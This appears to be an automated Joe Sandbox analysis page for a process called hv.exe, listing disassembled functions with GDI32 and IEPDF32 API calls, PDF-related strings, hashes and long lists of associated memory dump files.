Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c370000_hv.jbxd

Similarity

API ID: Object$CapsDevice$Select$BitmapCreateDeleteModeStretchType
String ID:
API String ID: 3133578033-0
Opcode ID: a828d653b0fc3bc2b41e3bc3c775c91b1e23b52f7d671b26b31dbd18d714031c
Instruction ID: 1f839d77b786cce26cbf292b124fe6d15815de51469bba63cc6f0cc7d1fc67f5
Opcode Fuzzy Hash: a828d653b0fc3bc2b41e3bc3c775c91b1e23b52f7d671b26b31dbd18d714031c
Instruction Fuzzy Hash: 1331A071A007489FDB209F75C845A6BBBF4FF45700F008A2DE9A686651DB74E944CBA4

Function 6C44C670 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112COMMON

Download Yara Rule

APIs

#70.IEPDF32(?), ref: 6C44C6A5

Strings

Subtype, xrefs: 6C44CCDB
._l, xrefs: 6C44CBEB
Highlight, xrefs: 6C44CCF0

Memory Dump Source

Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true

Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c370000_hv.jbxd

Similarity

API ID:
String ID: ._l$Highlight$Subtype
API String ID: 0-2981372065
Opcode ID: 81c5e6122e59eb7bb2549b7a39cf7db162150e9669e973434d26241e348ecb36
Instruction ID: f3b983ee2586d095a9feff6960e3e749fb75bce17bd3d74aa55a60df9c1e0ea7
Opcode Fuzzy Hash: 81c5e6122e59eb7bb2549b7a39cf7db162150e9669e973434d26241e348ecb36
Instruction Fuzzy Hash: 4721F671F0111D8FFB04DE658880E7B7769EF88615F254929D9285BF50E730980A86D0

Function 6C452460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

#214.IEPDF32(?), ref: 6C45248D
#214.IEPDF32(?,?,?), ref: 6C45263A

Strings

Rect, xrefs: 6C4526D7
Subtype, xrefs: 6C452530
Link, xrefs: 6C452548

Memory Dump Source

Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true

Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c370000_hv.jbxd

Similarity

API ID: #214
String ID: Link$Rect$Subtype
API String ID: 1405426997-3862875103
Opcode ID: a41d0ebe7823f1382faa54b066779bb6f48bd41cca015a35415ad01b3bb38775
Instruction ID: 0020c53cf959333ae5ebda64a56ceeb75d2760cf233f1ebf2c21a2ca6d960539
Opcode Fuzzy Hash: a41d0ebe7823f1382faa54b066779bb6f48bd41cca015a35415ad01b3bb38775
Instruction Fuzzy Hash: 86518F317012198FDF20CF68C894EAEBBB5EF48619B50006AD856AB785DF30ED15CBA1

Analysis Process: hv.exePID: 3324, Parent PID: 5668COMMON

Non-executed Functions

Function 6BE72330 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 390COMMON

Download Yara Rule

APIs

#214.IEPDF32(?), ref: 6BE7248D
#214.IEPDF32(?,?,?), ref: 6BE7263A

Strings

Rect, xrefs: 6BE726D7
Link, xrefs: 6BE72548
Subtype, xrefs: 6BE72530

Memory Dump Source

Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true

Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd

Similarity

API ID: #214
String ID: Link$Rect$Subtype
API String ID: 1405426997-3862875103
Opcode ID: 4f032cc5519f6c7e9f0be93eb075e0b717170ff322f08bb4b7780488c10f803d
Instruction ID: df966d40d4a1f361a361b36a4bf07c0ef07cb9592c002a7708b0c6ed28f1c561
Opcode Fuzzy Hash: 4f032cc5519f6c7e9f0be93eb075e0b717170ff322f08bb4b7780488c10f803d
Instruction Fuzzy Hash: 8EC1F731B0021A9BDF14EF78C8919BFB7B5EF9A718B100469D9166B341DB38ED05CBA1

Function 6BE6D760 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 385COMMON

Download Yara Rule

APIs

#73.IEPDF32(?), ref: 6BE6D777

Part of subcall function 6BE6CEE0: #70.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BE6CEEB

#73.IEPDF32(?), ref: 6BE6D80A
#73.IEPDF32(00000000,?,?,Rect), ref: 6BE6D915

Strings

BBox, xrefs: 6BE6D98A, 6BE6DA00
Rect, xrefs: 6BE6D8F7, 6BE6DAD0

Memory Dump Source

Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true

Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd

Similarity

API ID:
String ID: BBox$Rect
API String ID: 0-3854271352
Opcode ID: d89f2ddaeca1d69ea953fd4e68f2e148909cb14a43190244d13c1793c7facab5
Instruction ID: 36ce56749b17738ca5ea882b09baba6ccaaa3b21b0ef9045648ee252022aa190
Opcode Fuzzy Hash: d89f2ddaeca1d69ea953fd4e68f2e148909cb14a43190244d13c1793c7facab5
Instruction Fuzzy Hash: FEC11B35B402195FDB04DF74D881ABEB7B5FF89758F604528E915AB340EB34E911C7A0

Function 6BE6E610 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

Type, xrefs: 6BE6F1E9
Annot, xrefs: 6BE6F201

Memory Dump Source

Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true

Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd

Similarity

API ID:
String ID: Annot$Type
API String ID: 0-395718979
Opcode ID: a43be9cd971e03d4b482acc2047e5dfadc9f549897ada6f8355b2c4c170c2f00
Instruction ID: 01f8b8e2dc567c53d10f44513a5242a277d3d63fc33d9710d873372f54d327a9
Opcode Fuzzy Hash: a43be9cd971e03d4b482acc2047e5dfadc9f549897ada6f8355b2c4c170c2f00
Instruction Fuzzy Hash: 8CB1C375B406198FDB14CF74C88176EB7B5FF89384F104899D91AAB381EB38AD06CB91

Function 6BE73AB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true

Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1954432d402aa53da50adf09b9499b3b86813e0521b5a5d6a3a8ca0ede292353
Instruction ID: e176cbac52f80ef38ac02974bdd7cbcc17d276c73f275b6d67e908a8ed442326
Opcode Fuzzy Hash: 1954432d402aa53da50adf09b9499b3b86813e0521b5a5d6a3a8ca0ede292353
Instruction Fuzzy Hash: 62812971B007198FDB60EF74C480A6AB7B1FF89314F204769DA15AB341EB34E952CBA1

Function 6BE4FC6C Relevance: 15.1, APIs: 10, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000004), ref: 6BE4FC9B
GetObjectType.GDI32(?), ref: 6BE4FCA4
CreateBitmap.GDI32 ref: 6BE4FCD3
SelectObject.GDI32(?,00000000), ref: 6BE4FCDD
GetObjectW.GDI32(00000000,00000018,?), ref: 6BE4FCFD
SelectObject.GDI32(?,00000000), ref: 6BE4FD21
DeleteObject.GDI32(00000000), ref: 6BE4FD28
GetDeviceCaps.GDI32(?,0000000C), ref: 6BE4FD3B
GetDeviceCaps.GDI32(?,00000008), ref: 6BE4FD45
GetDeviceCaps.GDI32(?,0000000A), ref: 6BE4FD4F

Memory Dump Source

Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true

Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
